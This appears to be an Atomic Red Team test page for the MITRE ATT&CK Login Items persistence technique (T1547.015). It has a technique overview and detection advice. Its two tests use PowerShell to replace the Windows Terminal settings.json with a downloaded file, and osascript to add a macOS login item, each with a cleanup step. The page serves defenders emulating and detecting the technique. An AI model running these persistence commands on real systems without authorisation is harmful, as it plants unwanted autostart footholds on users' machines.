# T1547.015 - Login Items
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.

Login items installed using the Service Management Framework leverage <code>launchd</code>, are not visible in the System Preferences, and can only be removed by the application that created them.(Citation: Adding Login Items)(Citation: SMLoginItemSetEnabled Schroeder 2013) Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.(Citation: Launch Services Apple Developer) Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.

Adversaries can utilize [AppleScript](https://attack.mitre.org/techniques/T1059/002) and [Native API](https://attack.mitre.org/techniques/T1106) calls to create a login item to spawn malicious executables.(Citation: ELC Running at startup) Prior to version 10.5 on macOS, adversaries can add login items by using [AppleScript](https://attack.mitre.org/techniques/T1059/002) to send an Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.(Citation: Login Items AE) Adversaries can use a command such as <code>tell application “System Events” to make login item at end with properties /path/to/executable</code>.(Citation: Startup Items Eclectic)(Citation: hexed osx.dok analysis 2019)(Citation: Add List Remove Login Items Apple Script) This command adds the path of the malicious executable to the login item file list located in <code>~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm</code>.(Citation: Startup Items Eclectic) Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)(Citation: objsee netwire backdoor 2019)

## Atomic Tests

### Atomic Test #1 - Persistence by modifying Windows Terminal profile
Modify Windows Terminal settings.json file to gain persistence. [Twitter Post](https://twitter.com/nas_bench/status/1550836225652686848)
**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Windows Terminal must be installed

##### Check Prereq Commands:
```powershell
if (Test-Path ~\AppData\Local\Microsoft\WindowsApps\Microsoft.WindowsTerminal_8wekyb3d8bbwe\wt.exe) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
$(rm ~\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalState\StoreEdgeFD\installed.db -ErrorAction Ignore; Write-Output ""; $?) -and $(winget install --id=Microsoft.WindowsTerminal)

```

In [ ]:
Invoke-AtomicTest T1547.015 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
mv ~\AppData\Local\Packages\Microsoft.WindowsTerminal_8wekyb3d8bbwe\LocalState\settings.json ~\AppData\Local\Temp\settings.json
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/src/settings.json?raw=true" -OutFile "~\AppData\Local\Packages\Microsoft.WindowsTerminal_8wekyb3d8bbwe\LocalState\settings.json"
wt.exe
```

In [ ]:
Invoke-AtomicTest T1547.015 -TestNumbers 1

#### Cleanup: 
```powershell
mv -Force ~\AppData\Local\Temp\settings.json ~\AppData\Local\Packages\Microsoft.WindowsTerminal_8wekyb3d8bbwe\LocalState\settings.json
taskkill /F /IM "calculator.exe" > $null
```

In [ ]:
Invoke-AtomicTest T1547.015 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Add macOS LoginItem using ApplescriptRuns osascript on a file to create new LoginItem for current user.
NOTE: Will popup dialog prompting user to Allow or Deny Terminal.app to control "System Events"
Therefore, it can't be automated until the TCC is granted.
The login item launches Safari.app when user logs in, but there is a cleanup script to remove it as well.
In addition to the `osascript` Process Events, file modification events to
`/Users/*/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm` should be seen.
**Supported Platforms:** macos#### Attack Commands: Run with `bash`
```bash
osascript PathToAtomicsFolder/T1547.015/src/add_login_item.osa
```

In [ ]:
Invoke-AtomicTest T1547.015 -TestNumbers 2

#### Cleanup: 
```bash
osascript PathToAtomicsFolder/T1547.015/src/remove_login_item.osa
```

In [ ]:
Invoke-AtomicTest T1547.015 -TestNumbers 2 -Cleanup

## Detection
All login items created via shared file lists are viewable by using the System Preferences GUI or in the <code>~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm</code> file.(Citation: Open Login Items Apple)(Citation: Startup Items Eclectic)(Citation: objsee block blocking login items)(Citation: sentinelone macos persist Jun 2019) These locations should be monitored and audited for known good applications.

Otherwise, login Items are located in <code>Contents/Library/LoginItems</code> within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items) Monitor applications that leverage login items with either the LSUIElement or LSBackgroundOnly key in the Info.plist file set to true.(Citation: Adding Login Items)(Citation: Launch Service Keys Developer Apple)

Monitor processes that start at login for unusual or unknown applications. Usual applications for login items could include what users add to configure their user environment, such as email, chat, or music applications, or what administrators include for organization settings and protections. Check for running applications from login items that also have abnormal behavior,, such as establishing network connections.